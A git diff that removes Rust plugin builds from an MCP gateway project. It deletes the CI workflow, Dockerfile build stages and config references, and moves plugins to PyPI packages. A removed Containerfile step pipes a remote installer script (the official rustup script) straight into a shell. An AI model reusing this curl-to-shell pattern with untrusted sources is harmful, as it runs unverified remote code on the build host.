diff --git a/.claude/skills/pr-risk-scoring/score_prs.py b/.claude/skills/pr-risk-scoring/score_prs.py index bd5ec23e46..1101a3007f 100755 --- a/.claude/skills/pr-risk-scoring/score_prs.py +++ b/.claude/skills/pr-risk-scoring/score_prs.py @@ -11,6 +11,7 @@ approvals_csv Optional CSV with columns: pr_number,approvals """ +# Standard import csv import json import os @@ -167,7 +168,7 @@ def compute_security_score(files, labels): return min(score, 5) -PROD_PREFIXES = ("mcpgateway/", "plugins/", "plugins_rust/", "a2a-agents/", "mcp-servers/", "tools_rust/") +PROD_PREFIXES = ("mcpgateway/", "plugins/", "a2a-agents/", "mcp-servers/", "tools_rust/") def compute_test_score(files): diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index a0f8fa7eb5..818260b8b7 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -6,7 +6,6 @@ /mcpgateway/plugins @araujof @terylt @jonpspri # Rust projects -/plugins_rust/ @lucarlig @dima-zakharov /tools_rust/ @lucarlig @dima-zakharov /mcp-servers/rust/ @lucarlig @dima-zakharov diff --git a/.github/workflows/pytest.yml b/.github/workflows/pytest.yml index 573c56186a..e609196400 100644 --- a/.github/workflows/pytest.yml +++ b/.github/workflows/pytest.yml @@ -83,31 +83,17 @@ jobs: python-version: ${{ matrix.python }} # ----------------------------------------------------------- - # 2.5 Setup Rust toolchain for Rust plugins + # Note: Rust plugin builds removed - all plugins now distributed as PyPI packages + # Rust MCP runtime (tools_rust/mcp_runtime) not needed for main pytest suite + # (e2e_rust tests are excluded and run in separate workflow) # ----------------------------------------------------------- - - name: 🦀 Install Rust stable - run: rustup default stable - - - name: 📦 Cache Cargo dependencies - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: | - ~/.cargo/registry - ~/.cargo/git - plugins_rust/*/target - key: ${{ runner.os }}-cargo-${{ hashFiles('**/Cargo.lock') }} - restore-keys: | - ${{ runner.os }}-cargo- - - - name: 🔨 Build Rust plugins (clean, install, verify stubs) - run: make rust-clean-stubs && make rust-install && make rust-verify-stubs # ----------------------------------------------------------- # 3️⃣ Run the tests with coverage (fail under 95 %total coverage) # ----------------------------------------------------------- - name: 🧪 Run pytest run: | - uv run pytest -n auto \ + uv run --extra plugins pytest -n auto \ --durations=5 \ --ignore=tests/fuzz \ --ignore=tests/e2e/test_entra_id_integration.py \ @@ -117,8 +103,6 @@ jobs: --cov-report=term \ --cov-branch \ --cov-fail-under=95 - env: - REQUIRE_RUST: "1" # ----------------------------------------------------------- # 3.5 Diff-cover: enforce 93% coverage on changed lines (PRs only) diff --git a/.github/workflows/rust-plugins.yml b/.github/workflows/rust-plugins.yml deleted file mode 100644 index 3873dc6633..0000000000 --- a/.github/workflows/rust-plugins.yml +++ /dev/null @@ -1,297 +0,0 @@ -name: Rust Plugins CI/CD - -on: - push: - branches: [main, develop] - paths: - - "plugins_rust/**" - - "plugins/pii_filter/**" - - ".github/workflows/rust-plugins.yml" - pull_request: - types: [opened, synchronize, ready_for_review] - branches: [main, develop] - paths: - - "plugins_rust/**" - - "plugins/pii_filter/**" - workflow_dispatch: - -env: - CARGO_TERM_COLOR: always - RUST_BACKTRACE: 1 - -concurrency: - group: ${{ github.workflow }}-${{ github.ref }} - cancel-in-progress: true - -permissions: - contents: read - -jobs: - # Rust unit tests and linting (all plugins in one job per OS) - rust-tests: - if: github.event_name != 'pull_request' || !github.event.pull_request.draft - name: Rust Tests (${{ matrix.os }}) - runs-on: ${{ matrix.os }} - timeout-minutes: 60 - strategy: - fail-fast: false - matrix: - os: ${{ github.event_name == 'pull_request' && fromJSON('["ubuntu-latest"]') || fromJSON('["ubuntu-latest", "macos-latest", "windows-latest"]') }} - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Install Rust components - run: | - rustup toolchain install stable - rustup component add rustfmt clippy - rustup default stable - - - name: Cache Cargo registry - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: ~/.cargo/registry - key: ${{ runner.os }}-cargo-registry-${{ hashFiles('**/Cargo.lock') }} - - - name: Cache Cargo index - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: ~/.cargo/git - key: ${{ runner.os }}-cargo-index-${{ hashFiles('**/Cargo.lock') }} - - - name: Cache Cargo build - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: plugins_rust/*/target - key: ${{ runner.os }}-cargo-build-${{ hashFiles('**/Cargo.lock') }} - - # rust-check = fmt-check + clippy + cargo test only - - name: Run all checks for plugins - run: make rust-check - - # Build wheels for multiple platforms (all plugins in one job per OS) - build-wheels: - if: github.event_name != 'pull_request' || !github.event.pull_request.draft - name: Build wheels (${{ matrix.os }}) - runs-on: ${{ matrix.os }} - timeout-minutes: 60 - strategy: - fail-fast: false - matrix: - os: ${{ github.event_name == 'pull_request' && fromJSON('["ubuntu-latest"]') || fromJSON('["ubuntu-latest", "macos-latest", "windows-latest"]') }} - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Set up Python - uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 - with: - python-version: "3.12" - - - name: Install Rust stable - run: rustup default stable - - - name: Install uv - uses: astral-sh/setup-uv@d0d8abe699bfb85fec6de9f7adb5ae17292296ff # v6 - with: - version: "0.10.11" - - - name: Install maturin as CLI tool - run: uv tool install maturin - - - name: Build wheels for all plugins - run: make rust-build-wheels - - - name: Upload wheels as artifacts - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4 - with: - name: wheels-build-${{ matrix.os }} - path: plugins_rust/*/dist/*.whl - - # Security audit (all plugins in one job) - security-audit: - if: github.event_name != 'pull_request' || !github.event.pull_request.draft - name: Security Audit - runs-on: ubuntu-latest - timeout-minutes: 60 - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Install Rust stable - run: rustup default stable - - - name: Install cargo-audit - run: cargo install cargo-audit - - - name: Install cargo-deny - run: cargo install cargo-deny - - - name: Run security audit on all plugins - run: make rust-audit - - # cargo-audit covers advisories separately; cargo-deny here enforces policy and licensing. - - name: Run cargo-deny policy checks on all plugins - run: make rust-deny - - # Benchmark build verification (compile benchmark targets without running them) - release-build-verification: - if: github.event_name != 'pull_request' || !github.event.pull_request.draft - name: Benchmark Build Verification - runs-on: ubuntu-latest - timeout-minutes: 60 - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Install Rust stable - run: rustup default stable - - - name: Cache Cargo registry - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: ~/.cargo/registry - key: ${{ runner.os }}-cargo-registry-${{ hashFiles('**/Cargo.lock') }} - - - name: Cache Cargo index - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: ~/.cargo/git - key: ${{ runner.os }}-cargo-index-${{ hashFiles('**/Cargo.lock') }} - - - name: Cache Cargo build - uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4 - with: - path: plugins_rust/*/target - key: ${{ runner.os }}-cargo-benchmark-build-${{ hashFiles('**/Cargo.lock') }} - - - name: Compile Rust plugin benchmarks without running them - run: make rust-bench-build - - # Coverage report (all plugins in one job) - coverage: - if: github.event_name != 'pull_request' || !github.event.pull_request.draft - name: Code Coverage - runs-on: ubuntu-latest - timeout-minutes: 60 - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Set up Python - uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 - with: - python-version: "3.12" - - - name: Install Rust stable and components - run: | - rustup default stable - rustup component add llvm-tools-preview - - - name: Install uv - uses: astral-sh/setup-uv@d0d8abe699bfb85fec6de9f7adb5ae17292296ff # v6 - with: - version: "0.10.11" - - - name: Install maturin as CLI tool - run: uv tool install maturin - - - name: Create virtual environment - run: uv venv - - - name: Install coverage tools - run: | - uv pip install pytest pytest-cov pydantic - cargo install cargo-llvm-cov - - - name: Run coverage for all plugins - run: make rust-coverage - - - name: Upload coverage to Codecov - uses: codecov/codecov-action@b9fd7d16f6d7d1b5d2bec1a2887e65ceed900238 # v4 - with: - files: ./plugins_rust/*/coverage/cobertura.xml - flags: rust-plugins - name: rust-plugins-coverage - - # Build documentation (all plugins in one job) - documentation: - if: github.event_name != 'pull_request' || !github.event.pull_request.draft - name: Build Documentation - runs-on: ubuntu-latest - timeout-minutes: 60 - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Install Rust stable - run: rustup default stable - - - name: Build Rust docs for all plugins - run: make rust-doc - - - name: Upload documentation - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4 - with: - name: rust-docs - path: plugins_rust/*/target/doc - - # Release build (only on tags, all plugins per OS) - release: - name: Release Build (${{ matrix.os }}) - runs-on: ${{ matrix.os }} - timeout-minutes: 60 - if: startsWith(github.ref, 'refs/tags/') - needs: rust-tests - strategy: - fail-fast: false - matrix: - os: [ubuntu-latest, macos-latest, windows-latest] - - steps: - - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4 - with: - persist-credentials: false - - - name: Set up Python - uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 - with: - python-version: "3.12" - - - name: Install Rust stable - run: rustup default stable - - - name: Install uv - uses: astral-sh/setup-uv@d0d8abe699bfb85fec6de9f7adb5ae17292296ff # v6 - with: - version: "0.10.11" - - - name: Install maturin as CLI tool - run: uv tool install maturin - - - name: Build and publish release wheels - env: - MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }} - run: | - make rust-release - if [ "${{ matrix.os }}" = "ubuntu-latest" ]; then - make rust-release-publish - fi - - - name: Upload release artifacts - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4 - with: - name: release-wheels-${{ matrix.os }} - path: plugins_rust/*/dist/*.whl diff --git a/.gitignore b/.gitignore index 6743471738..3cceb8e53a 100644 --- a/.gitignore +++ b/.gitignore @@ -262,11 +262,6 @@ uv.lock .uv-cache/ .uv-tmp/ -# ======================================== -# Rust (plugins_rust) -# ======================================== -plugins_rust/target/ -plugins_rust/*/target/ *.rs.bk # ======================================== diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index e669c0e0f9..462a70d6ed 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -36,7 +36,7 @@ repos: - id: detect-private-key name: 🔐 Detect Private Key description: Detects the presence of private keys. - exclude: (mcpgateway/utils/generate_keys|tests/unit/mcpgateway/utils/test_generate_keys|tests/unit/mcpgateway/plugins/framework/external/mcp/test_tls_utils)\.py|plugins_rust/secrets_detection/examples/heavy_workload\.rs|plugins_rust/secrets_detection/src/scanner\.rs|plugins_rust/secrets_detection/src/patterns\.rs + exclude: (mcpgateway/utils/generate_keys|tests/unit/mcpgateway/utils/test_generate_keys|tests/unit/mcpgateway/plugins/framework/external/mcp/test_tls_utils)\.py types: [text] # ----------------------------------------------------------------------------- @@ -248,7 +248,6 @@ repos: name: ✅ Check Shebang Scripts Are Executable description: Ensures that (non-binary) files with a shebang are executable. types: [text] - exclude: plugins_rust/secrets_detection/compare_performance\.py stages: [pre-commit, pre-push, manual] - id: forbid-new-submodules diff --git a/.pre-commit-lite.yaml b/.pre-commit-lite.yaml index 43fba79b04..9ff9a55f27 100644 --- a/.pre-commit-lite.yaml +++ b/.pre-commit-lite.yaml @@ -40,7 +40,7 @@ repos: name: 🔐 Detect Private Key description: Detects the presence of private keys. types: [text] - exclude: 'mcpgateway/utils/generate_keys\.py|tests/unit/mcpgateway/plugins/framework/external/mcp/test_tls_utils.py|tests/unit/mcpgateway/utils/test_generate_keys.py|plugins_rust/secrets_detection/examples/heavy_workload\.rs|plugins_rust/secrets_detection/src/scanner\.rs|plugins_rust/secrets_detection/src/patterns\.rs' + exclude: 'mcpgateway/utils/generate_keys\.py|tests/unit/mcpgateway/plugins/framework/external/mcp/test_tls_utils.py|tests/unit/mcpgateway/utils/test_generate_keys.py' # ----------------------------------------------------------------------------- # ❌ Forbid Specific AI / LLM Patterns @@ -251,7 +251,6 @@ repos: name: ✅ Check Shebang Scripts Are Executable description: Ensures that (non-binary) files with a shebang are executable. types: [text] - exclude: 'plugins_rust/secrets_detection/compare_performance\.py' stages: [pre-commit, pre-push, manual] - id: forbid-new-submodules diff --git a/.secrets.baseline b/.secrets.baseline index 6de237a027..bba58a2368 100644 --- a/.secrets.baseline +++ b/.secrets.baseline @@ -3,7 +3,7 @@ "files": "^.secrets.baseline$|package-lock.json|Cargo.lock|scripts/sign_image.sh|scripts/zap|sonar-project.properties|uv.lock", "lines": null }, - "generated_at": "2026-04-08T16:53:59Z", + "generated_at": "2026-04-10T12:16:30Z", "plugins_used": [ { "name": "AWSKeyDetector" @@ -344,7 +344,7 @@ "hashed_secret": "844c398e469ef3fb919da3778944365ab2175fb7", "is_secret": false, "is_verified": false, - "line_number": 377, + "line_number": 371, "type": "Secret Keyword", "verified_result": null }, @@ -352,7 +352,7 @@ "hashed_secret": "319037749ce37e577db0b3628c7f90e333544391", "is_secret": false, "is_verified": false, - "line_number": 801, + "line_number": 795, "type": "Secret Keyword", "verified_result": null }, @@ -360,7 +360,7 @@ "hashed_secret": "6ae2832e494d1098e8901fe156083e39399a24f1", "is_secret": false, "is_verified": false, - "line_number": 803, + "line_number": 797, "type": "Secret Keyword", "verified_result": null }, @@ -368,7 +368,7 @@ "hashed_secret": "43fc45734b96bcb1b6cef373e949eb3524ae199b", "is_secret": false, "is_verified": false, - "line_number": 1494, + "line_number": 1488, "type": "Secret Keyword", "verified_result": null }, @@ -376,7 +376,7 @@ "hashed_secret": "9d989e8d27dc9e0ec3389fc855f142c3d40f0c50", "is_secret": false, "is_verified": false, - "line_number": 1704, + "line_number": 1698, "type": "Secret Keyword", "verified_result": null }, @@ -384,7 +384,7 @@ "hashed_secret": "d3ac7a4ef1a838b4134f2f6e7f3c0d249d74b674", "is_secret": false, "is_verified": false, - "line_number": 6072, + "line_number": 6049, "type": "Secret Keyword", "verified_result": null }, @@ -392,7 +392,7 @@ "hashed_secret": "5932862bcd24dd27d0dc0407ec94fe9d6ea24aeb", "is_secret": false, "is_verified": false, - "line_number": 6569, + "line_number": 6546, "type": "Secret Keyword", "verified_result": null }, @@ -400,7 +400,7 @@ "hashed_secret": "c77c805e32f173e4321ee9187de9c29cb3804513", "is_secret": false, "is_verified": false, - "line_number": 6581, + "line_number": 6558, "type": "Secret Keyword", "verified_result": null }, @@ -408,7 +408,7 @@ "hashed_secret": "8fe3df8a68ddd0d4ab2214186cbb8e38ccd0e06a", "is_secret": false, "is_verified": false, - "line_number": 6653, + "line_number": 6630, "type": "Secret Keyword", "verified_result": null }, @@ -416,7 +416,7 @@ "hashed_secret": "93ac8946882128457cd9e283b30ca851945e6690", "is_secret": false, "is_verified": false, - "line_number": 7747, + "line_number": 7724, "type": "Secret Keyword", "verified_result": null } @@ -2204,7 +2204,7 @@ "hashed_secret": "25910f981e85ca04baf359199dd0bd4a3ae738b6", "is_secret": false, "is_verified": false, - "line_number": 852, + "line_number": 848, "type": "AWS Access Key", "verified_result": null } @@ -8599,16 +8599,6 @@ "verified_result": null } ], - "tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py": [ - { - "hashed_secret": "25910f981e85ca04baf359199dd0bd4a3ae738b6", - "is_secret": false, - "is_verified": false, - "line_number": 505, - "type": "AWS Access Key", - "verified_result": null - } - ], "tests/unit/mcpgateway/plugins/plugins/tools_telemetry_exporter/test_tools_telemetry_exporter.py": [ { "hashed_secret": "e8af0e18ff4805f4efd84f58b0fa69e3780f35a4", @@ -10086,7 +10076,7 @@ "hashed_secret": "d63b39580934e062f89aae63426d2f2c77c3e258", "is_secret": false, "is_verified": false, - "line_number": 503, + "line_number": 504, "type": "Base64 High Entropy String", "verified_result": null }, @@ -10094,7 +10084,7 @@ "hashed_secret": "586a55a9b8b97f0cd88e24ce8279ebc955949688", "is_secret": false, "is_verified": false, - "line_number": 504, + "line_number": 505, "type": "Secret Keyword", "verified_result": null }, @@ -10102,7 +10092,7 @@ "hashed_secret": "00cafd126182e8a9e7c01bb2f0dfd00496be724f", "is_secret": false, "is_verified": false, - "line_number": 520, + "line_number": 521, "type": "Secret Keyword", "verified_result": null }, @@ -10110,7 +10100,7 @@ "hashed_secret": "7b1552c7c7ffb8bd70b5666e5997c8e017630aab", "is_secret": false, "is_verified": false, - "line_number": 1935, + "line_number": 1936, "type": "Base64 High Entropy String", "verified_result": null }, @@ -10118,7 +10108,7 @@ "hashed_secret": "9fb7fe1217aed442b04c0f5e43b5d5a7d3287097", "is_secret": false, "is_verified": false, - "line_number": 2871, + "line_number": 2872, "type": "Secret Keyword", "verified_result": null }, @@ -10126,7 +10116,7 @@ "hashed_secret": "72cb70dbbafe97e5ea13ad88acd65d08389439b0", "is_secret": false, "is_verified": false, - "line_number": 3499, + "line_number": 3500, "type": "Secret Keyword", "verified_result": null }, @@ -10134,7 +10124,7 @@ "hashed_secret": "ee977806d7286510da8b9a7492ba58e2484c0ecc", "is_secret": false, "is_verified": false, - "line_number": 5792, + "line_number": 5793, "type": "Secret Keyword", "verified_result": null }, @@ -10142,7 +10132,7 @@ "hashed_secret": "f2e7745f43b0ef0e2c2faf61d6c6a28be2965750", "is_secret": false, "is_verified": false, - "line_number": 6284, + "line_number": 6285, "type": "Secret Keyword", "verified_result": null }, @@ -10150,7 +10140,7 @@ "hashed_secret": "4a249743d4d2241bd2ae085b4fe654d089488295", "is_secret": false, "is_verified": false, - "line_number": 7494, + "line_number": 7632, "type": "Secret Keyword", "verified_result": null }, @@ -10158,7 +10148,7 @@ "hashed_secret": "0c8d051d3c7eada5d31b53d9936fce6bcc232ae2", "is_secret": false, "is_verified": false, - "line_number": 7632, + "line_number": 7770, "type": "Secret Keyword", "verified_result": null }, @@ -10166,7 +10156,7 @@ "hashed_secret": "f2b14f68eb995facb3a1c35287b778d5bd785511", "is_secret": false, "is_verified": false, - "line_number": 8008, + "line_number": 8146, "type": "Secret Keyword", "verified_result": null } @@ -11260,7 +11250,7 @@ "hashed_secret": "55d2534ed6ad4f269b428160428fa2f6f541ba7b", "is_secret": false, "is_verified": false, - "line_number": 156, + "line_number": 136, "type": "Base64 High Entropy String", "verified_result": null }, @@ -11268,7 +11258,7 @@ "hashed_secret": "cf743b3a58a4d0f91c1d7f5825c0b1b5f7758174", "is_secret": false, "is_verified": false, - "line_number": 538, + "line_number": 504, "type": "Base64 High Entropy String", "verified_result": null }, @@ -11276,7 +11266,7 @@ "hashed_secret": "8e42b03e460b2cf358ffbcf4da3bc5d14a22c86e", "is_secret": false, "is_verified": false, - "line_number": 582, + "line_number": 548, "type": "Base64 High Entropy String", "verified_result": null }, @@ -11284,7 +11274,7 @@ "hashed_secret": "2093dd9cf307518cfe1d2fa5a3985d6fec4e995e", "is_secret": false, "is_verified": false, - "line_number": 595, + "line_number": 561, "type": "Base64 High Entropy String", "verified_result": null }, @@ -11292,7 +11282,7 @@ "hashed_secret": "caa924f200b35ceb6f0e33878faff75203bdccb4", "is_secret": false, "is_verified": false, - "line_number": 971, + "line_number": 930, "type": "Secret Keyword", "verified_result": null }, @@ -11300,7 +11290,7 @@ "hashed_secret": "f16da2820437f3c703ff5b95c813f310ce8e67a4", "is_secret": false, "is_verified": false, - "line_number": 1288, + "line_number": 1179, "type": "Secret Keyword", "verified_result": null } @@ -11320,7 +11310,7 @@ "hashed_secret": "86de8c52637ec530fe39b0a8471da9b8764d5242", "is_secret": false, "is_verified": false, - "line_number": 665, + "line_number": 141, "type": "AWS Access Key", "verified_result": null } diff --git a/AGENTS.md b/AGENTS.md index 1821a466cf..e08f21d1e7 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -33,7 +33,6 @@ mcpgateway/ # Core FastAPI application tests/ # Test suite (see tests/AGENTS.md) plugins/ # Plugin implementations (see plugins/AGENTS.md) -plugins_rust/ # Rust plugin implementations for performance-sensitive paths plugin_templates/ # Starter templates for building new plugins charts/ # Helm charts (see charts/AGENTS.md) docs/ # Architecture and usage documentation (see docs/AGENTS.md) @@ -68,8 +67,9 @@ make autoflake isort black pre-commit # Before committing, use ty, mypy and pyrefly to check just the new files, then run: make ruff bandit interrogate pylint verify -# Before committing Rust changes (plugins_rust/ or tools_rust/): -make rust-check # Runs fmt-check, clippy -D warnings, and cargo test for all Rust crates +# Before committing Rust changes (tools_rust/): +# Run fmt-check, clippy -D warnings, and cargo test for Rust crates +cd tools_rust/mcp_runtime && cargo fmt --check && cargo clippy -- -D warnings && cargo test ``` ## Authentication & RBAC Overview diff --git a/Containerfile b/Containerfile index 0b3d2b396d..081b03f57d 100644 --- a/Containerfile +++ b/Containerfile @@ -1,10 +1,3 @@ -############################################################################### -# Rust builder stage - builds Rust plugins in manylinux2014 container -# To build WITH Rust: docker build --build-arg ENABLE_RUST=true . -# To build WITHOUT Rust (default): docker build . -############################################################################### -ARG ENABLE_RUST=false - ########################### # Frontend builder stage ########################### @@ -24,49 +17,6 @@ COPY vite.config.js ./ # Run Vite build (cleans old bundles and generates fresh manifest) RUN npm run vite:build -FROM quay.io/pypa/manylinux2014:2026.03.06-3 AS rust-builder-base -ARG ENABLE_RUST - -# Set shell with pipefail for safety -SHELL ["/bin/bash", "-o", "pipefail", "-c"] - -# Only build if ENABLE_RUST=true -RUN if [ "$ENABLE_RUST" != "true" ]; then \ - echo "⏭️ Rust builds disabled (set --build-arg ENABLE_RUST=true to enable)"; \ - mkdir -p /build/rust-wheels; \ - exit 0; \ - fi - -# Install Rust toolchain (only if ENABLE_RUST=true) -RUN if [ "$ENABLE_RUST" = "true" ]; then \ - curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable; \ - fi -ENV PATH="/root/.cargo/bin:$PATH" - -WORKDIR /build - -# Copy only Rust plugin files (only if ENABLE_RUST=true) -COPY plugins_rust/ /build/plugins_rust/ - -# Build each Rust plugin independently using Python 3.12 from manylinux image -# Each plugin has its own Cargo.toml and is built separately -RUN if [ "$ENABLE_RUST" = "true" ]; then \ - mkdir -p /build/rust-wheels && \ - /opt/python/cp312-cp312/bin/python -m pip install --upgrade pip maturin && \ - for plugin_dir in /build/plugins_rust/*/; do \ - if [ -f "$plugin_dir/Cargo.toml" ]; then \ - plugin_name=$(basename "$plugin_dir"); \ - echo "🦀 Building Rust plugin: $plugin_name"; \ - (cd "$plugin_dir" && /opt/python/cp312-cp312/bin/maturin build --release --compatibility manylinux2014 --out /build/rust-wheels) || exit 1; \ - fi; \ - done && \ - echo "✅ Rust plugins built successfully"; \ - else \ - echo "⏭️ Skipping Rust plugin build"; \ - fi - -FROM rust-builder-base AS rust-builder - ############################################################################### # Main application stage ############################################################################### @@ -77,7 +27,6 @@ LABEL maintainer="Mihai Criveti" \ description="ContextForge: An enterprise-ready Model Context Protocol Gateway" ARG PYTHON_VERSION=3.12 -ARG GRPC_PYTHON_BUILD_SYSTEM_OPENSSL='False' # Install Python and build dependencies # hadolint ignore=DL3041 @@ -109,25 +58,13 @@ COPY . /app # Copy frontend build artifacts from frontend-builder stage COPY --from=frontend-builder /app/mcpgateway/static/ /app/mcpgateway/static/ -# Copy Rust plugin wheels from builder (if any exist) -COPY --from=rust-builder /build/rust-wheels/ /tmp/rust-wheels/ - # Create virtual environment, upgrade pip and install dependencies using uv for speed -# Including observability packages for OpenTelemetry support and Rust plugins (if built) +# Including observability packages for OpenTelemetry support and plugins from PyPI # Granian is included as an optional high-performance alternative to Gunicorn -ARG ENABLE_RUST=false RUN python3 -m venv /app/.venv && \ . /etc/profile.d/use-openssl.sh && \ /app/.venv/bin/python3 -m pip install --upgrade pip setuptools pdm uv && \ - /app/.venv/bin/python3 -m uv pip install ".[redis,postgres,observability,granian]" && \ - if [ "$ENABLE_RUST" = "true" ] && ls /tmp/rust-wheels/*.whl 1> /dev/null 2>&1; then \ - echo "🦀 Installing Rust plugins..."; \ - /app/.venv/bin/python3 -m pip install /tmp/rust-wheels/*.whl && \ - /app/.venv/bin/python3 -c "from pii_filter_rust.pii_filter_rust import PIIDetectorRust; print('✓ Rust PII filter installed successfully')"; \ - else \ - echo "⏭️ Rust plugins not available - using Python implementations"; \ - fi && \ - rm -rf /tmp/rust-wheels + /app/.venv/bin/python3 -m uv pip install ".[redis,postgres,observability,granian,plugins]" # update the user permissions RUN chown -R 1001:0 /app && \ diff --git a/Containerfile.lite b/Containerfile.lite index 5e5b583cc3..54374aac9d 100644 --- a/Containerfile.lite +++ b/Containerfile.lite @@ -31,7 +31,7 @@ ARG ENABLE_RUST_MCP_RMCP=false ARG ENABLE_PROFILING=false ############################################################################### -# Rust builder stage - builds Rust plugins in manylinux2014 container +# Rust builder stage - builds Rust MCP runtime # To build WITH Rust: docker build --build-arg ENABLE_RUST=true -f Containerfile.lite . # To build WITHOUT Rust (default): docker build -f Containerfile.lite . ############################################################################### @@ -45,7 +45,7 @@ SHELL ["/bin/bash", "-o", "pipefail", "-c"] # Only build if ENABLE_RUST=true RUN if [ "$ENABLE_RUST" != "true" ]; then \ echo "⏭️ Rust builds disabled (set --build-arg ENABLE_RUST=true to enable)"; \ - mkdir -p /build/rust-wheels /build/tools_rust/mcp_runtime/target/release; \ + mkdir -p /build/tools_rust/mcp_runtime/target/release; \ printf '#!/usr/bin/env sh\n' > /build/tools_rust/mcp_runtime/target/release/contextforge-mcp-runtime; \ printf 'echo "Rust MCP runtime not built into this image. Rebuild with --build-arg ENABLE_RUST=true." >&2\n' >> /build/tools_rust/mcp_runtime/target/release/contextforge-mcp-runtime; \ printf 'exit 1\n' >> /build/tools_rust/mcp_runtime/target/release/contextforge-mcp-runtime; \ @@ -61,24 +61,11 @@ ENV PATH="/root/.cargo/bin:$PATH" WORKDIR /build -# Copy only Rust plugin/runtime files (only if ENABLE_RUST=true) -COPY plugins_rust/ /build/plugins_rust/ +# Copy only Rust MCP runtime files (only if ENABLE_RUST=true) COPY tools_rust/mcp_runtime/ /build/tools_rust/mcp_runtime/ -# Build each Rust plugin independently using Python 3.12 from manylinux image -RUN if [ "$ENABLE_RUST" = "true" ]; then \ - mkdir -p /build/rust-wheels && \ - /opt/python/cp312-cp312/bin/python -m pip install --upgrade pip maturin && \ - for plugin_dir in "/build/plugins_rust/"*/; do \ - if [ -f "$plugin_dir/Cargo.toml" ]; then \ - plugin_name=$(basename "$plugin_dir"); \ - echo "🦀 Building Rust plugin: $plugin_name"; \ - (cd "$plugin_dir" && /opt/python/cp312-cp312/bin/maturin build --release --compatibility manylinux2014 --out /build/rust-wheels) || exit 1; \ - fi; \ - done && \ - echo "✅ Rust plugins built successfully"; \ - else \ - echo "⏭️ Skipping Rust plugin build"; \ +RUN if [ "$ENABLE_RUST" != "true" ]; then \ + echo "⏭️ Skipping Rust MCP runtime build"; \ fi WORKDIR /build/tools_rust/mcp_runtime @@ -164,11 +151,11 @@ RUN chmod 644 /etc/profile.d/use-openssl.sh # This maximizes Docker layer caching - dependencies change less often # ---------------------------------------------------------------------------- COPY pyproject.toml /app/ +COPY plugins/requirements.txt /app/plugins/requirements.txt # ---------------------------------------------------------------------------- -# Copy Rust plugin wheels from rust-builder stage (if any exist) +# Copy Rust MCP runtime from rust-builder stage # ---------------------------------------------------------------------------- -COPY --from=rust-builder /build/rust-wheels/ /tmp/rust-wheels/ COPY --from=rust-builder /build/tools_rust/mcp_runtime/target/release/contextforge-mcp-runtime /app/bin/contextforge-mcp-runtime # ---------------------------------------------------------------------------- @@ -182,7 +169,7 @@ COPY --from=frontend-builder /app/mcpgateway/static/ /app/mcpgateway/static/ # - Upgrade pip, setuptools, wheel, pdm, uv # - Install project dependencies and package # - Include observability packages for OpenTelemetry support -# - Install Rust plugins from pre-built wheels (if built) +# - Install plugins from PyPI (cpex-* packages) # - Optionally install profiling tools (memray, py-spy) if ENABLE_PROFILING=true # - Remove build tools but keep runtime dist-info # - Remove build caches and build artifacts @@ -196,19 +183,12 @@ RUN set -euo pipefail \ && /app/.venv/bin/pip install --no-cache-dir --upgrade pip setuptools wheel pdm uv \ && if [ "$(uname -m)" = "s390x" ]; then \ echo "📦 Installing dependencies for s390x architecture..."; \ - /app/.venv/bin/pip install --no-cache-dir ".[redis,observability,granian]" \ + /app/.venv/bin/pip install --no-cache-dir ".[redis,observability,granian,plugins]" \ && /app/.venv/bin/pip install --no-cache-dir "psycopg[c]>=3.3.3"; \ else \ - /app/.venv/bin/uv pip install ".[redis,postgres,observability,granian]"; \ - fi \ - && if [ "$ENABLE_RUST" = "true" ] && ls "/tmp/rust-wheels/"*.whl 1> /dev/null 2>&1; then \ - echo "🦀 Installing Rust plugins..."; \ - /app/.venv/bin/python3 -m pip install "/tmp/rust-wheels/"*.whl && \ - /app/.venv/bin/python3 -c "from pii_filter_rust.pii_filter_rust import PIIDetectorRust; print('✓ Rust PII filter installed successfully')"; \ - else \ - echo "⏭️ Rust plugins not available - using Python implementations"; \ + /app/.venv/bin/uv pip install ".[redis,postgres,observability,granian,plugins]"; \ fi \ - && rm -rf /tmp/rust-wheels \ + && echo "✅ Plugins installed from PyPI via [plugins] extra" \ && if [ "$ENABLE_PROFILING" = "true" ]; then \ echo "📊 Installing profiling tools (memray, py-spy)..."; \ 